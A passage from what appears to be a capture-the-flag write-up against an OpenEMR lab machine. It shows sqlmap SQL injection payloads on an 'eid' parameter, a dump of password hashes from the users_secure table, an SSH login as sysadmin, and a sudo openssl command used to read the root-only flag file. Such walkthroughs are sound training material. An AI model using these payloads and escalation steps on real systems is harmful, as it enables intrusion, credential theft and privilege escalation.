    Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)
    Payload: eid=1 AND (SELECT 4310 FROM (SELECT(SLEEP(5)))nHfp)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71626a6a71,0x685273536564596f59706b79575448676665704a484f696d6c52744b6b6a46437a68687751595054,0x7162627171),NULL-- -
---
[13:07:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38, PHP 7.2.34
back-end DBMS: MySQL &gt;= 5.6
[13:07:58] [INFO] fetching tables for database: 'openemr'
Database: openemr
[234 tables]
+---------------------------------------+
| array                                 |
| groups                                |
| log                                   |
| version                               |
| addresses                             |
| amc_misc_data                         |
| amendments                            |
| amendments_history                    |
| ar_activity                           |
| ar_session                            |
| audit_details                         |
| audit_master                          |
| automatic_notification                |
| background_services                   |
| batchcom                              |
|.                                      |
|.                                      |
|.#SHORTENED FOR EASE OF REPORT         |
| transactions                          |
| user_settings                         |
| users                                 |
| users_facility                        |
| users_secure                          |
| valueset                              |
| voids                                 |
| x12_partners                          |
+---------------------------------------+

[13:07:58] [INFO] fetched data logged to text files under '/home/user/.local/share/sqlmap/output/192.168.118.132'

[*] ending @ 13:07:58 /2021-04-23/
</code></pre><blockquote>
<p>Here we can see the users_secure table, which from the report we know to look into.</p>
</blockquote>
<pre><code class=language-TERM data-lang=TERM>┌──(user㉿kali)-[~]
└─$ sqlmap -r openemr.req --threads=10 -D openemr -T users_secure --dump
        ___
       __H__                                                                                                                                                                                                                                
 ___ ___[.]_____ ___ ___  {1.5.4#stable}                                                                                                                                                                                                    
|_ -| . [)]     | .'| . |                                                                                                                                                                                                                   
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                                                                                   
      |_|V...       |_|   http://sqlmap.org                                                                                                                                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:10:32 /2021-04-23/

[13:10:32] [INFO] parsing HTTP request from 'openemr.req'
[13:10:32] [INFO] resuming back-end DBMS 'mysql' 
[13:10:32] [INFO] testing connection to the target URL
[13:10:32] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: eid=(SELECT (CASE WHEN (6722=6722) THEN 1 ELSE (SELECT 8202 UNION SELECT 8377) END))

    Type: error-based
    Title: MySQL &gt;= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: eid=1 AND GTID_SUBSET(CONCAT(0x71626a6a71,(SELECT (ELT(4791=4791,1))),0x7162627171),4791)

    Type: time-based blind
    Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)
    Payload: eid=1 AND (SELECT 4310 FROM (SELECT(SLEEP(5)))nHfp)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71626a6a71,0x685273536564596f59706b79575448676665704a484f696d6c52744b6b6a46437a68687751595054,0x7162627171),NULL-- -
---
[13:10:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38, PHP 7.2.34
back-end DBMS: MySQL &gt;= 5.6
[13:10:32] [INFO] fetching columns for table 'users_secure' in database 'openemr'
[13:10:32] [INFO] fetching entries for table 'users_secure' in database 'openemr'
Database: openemr
Table: users_secure
[2 entries]
+----+---------+--------------------------------------------------------------+----------+---------------------+---------------+---------------+--------------------------------+-------------------+
| id | salt    | password                                                     | username | last_update         | salt_history1 | salt_history2 | password_history1              | password_history2 |
+----+---------+--------------------------------------------------------------+----------+---------------------+---------------+---------------+--------------------------------+-------------------+
| 1  | &lt;blank&gt; | $2a$05$0ZgJ/ckahD2RWsg3iN7b2uyt0p4ytBBQuJqMUduF.hH5K7TRhLNnW | &lt;blank&gt;  | 2021-03-28 21:46:23 | &lt;blank&gt;       | &lt;blank&gt;       | $2a$05$0ZgJ/ckahD2RWsg3iN7b2v$ | admin             |
| 4  | &lt;blank&gt; | $2a$05$uR2GSLF46MDxo.vHKyapAOxNAVhDyzUm3AxXNcTCPH3WYdrNwjUT. | &lt;blank&gt;  | 2021-03-26 22:35:10 | &lt;blank&gt;       | &lt;blank&gt;       | $2a$05$uR2GSLF46MDxo.vHKyapAS$ | sysadmin          |
+----+---------+--------------------------------------------------------------+----------+---------------------+---------------+---------------+--------------------------------+-------------------+

[13:10:32] [INFO] table 'openemr.users_secure' dumped to CSV file '/home/user/.local/share/sqlmap/output/192.168.118.132/dump/openemr/users_secure.csv'
[13:10:32] [INFO] fetched data logged to text files under '/home/user/.local/share/sqlmap/output/192.168.118.132'

[*] ending @ 13:10:32 /2021-04-23/

</code></pre><blockquote>
<p>We can crack the hash and ssh to the server</p>
</blockquote>
<pre><code class=language-term data-lang=term>┌──(user㉿kali)-[~]
└─$ ssh sysadmin@192.168.118.132                                                                                                                                                                                                      255 ⨯
The authenticity of host '192.168.118.132 (192.168.118.132)' can't be established.
ECDSA key fingerprint is SHA256:ZRkVNFCQPSUG1pbyc7qQXrxEY0uaOJ9FnfmpJ9Egjz0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.118.132' (ECDSA) to the list of known hosts.
sysadmin@192.168.118.132's password: 
Linux 93e4ad68c07c 5.4.82-0-virt #1-Alpine SMP Thu, 10 Dec 2020 08:58:01 UTC x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
sysadmin@93e4ad68c07c:~$ ls
user.txt
sysadmin@93e4ad68c07c:~$ cat user.txt
245_SKILLS{R3al_W0rld_Wr1teup}
</code></pre><blockquote>
<p>In order to get the root flag it was improtatnt to use sudo -l.</p>
</blockquote>
<pre><code class=language-term data-lang=term>sysadmin@93e4ad68c07c:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for sysadmin: 
Matching Defaults entries for sysadmin on 93e4ad68c07c:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sysadmin may run the following commands on 93e4ad68c07c:
    (ALL : ALL) /usr/bin/openssl
</code></pre><blockquote>
<p>Then going to GTFO bins we can find the method to read files using sudo with openssl</p>
</blockquote>
<pre><code class=language-term data-lang=term>sysadmin@93e4ad68c07c:~$ openssl enc -in &quot;/root/root.txt&quot;
Can't open /root/root.txt for reading, Permission denied
140438538339456:error:0200100D:system library:fopen:Permission denied:../crypto/bio/bss_file.c:69:fopen('/root/root.txt','rb')
140438538339456:error:2006D002:BIO routines:BIO_new_file:system lib:../crypto/bio/bss_file.c:78:
sysadmin@93e4ad68c07c:~$ sudo openssl enc -in &quot;/root/root.txt&quot;
245_SKILLS{Acc3s_All_Ar3@s}
</code></pre><p>Got the root flag.</p>
</div>
<div class=post-footer>
<div class=info>
</div>
</div>
</div>
</div>
</div>
</main>
</div><footer class="footer footer--base">
<div class=by_farbox>
<ul class=footer__list>
<li class=footer__item>
&copy;
AEC
2021
</li>
</ul>
</div>
</footer>
<script type=text/javascript src=/js/medium-zoom.min.71100d84fab0ad794b8399a66ac810700cc78d703f715dc10af4d7ba7b761362.js integrity="sha256-cRANhPqwrXlLg5mmasgQcAzHjXA/cV3BCvTXunt2E2I=" crossorigin=anonymous></script></body>
</html>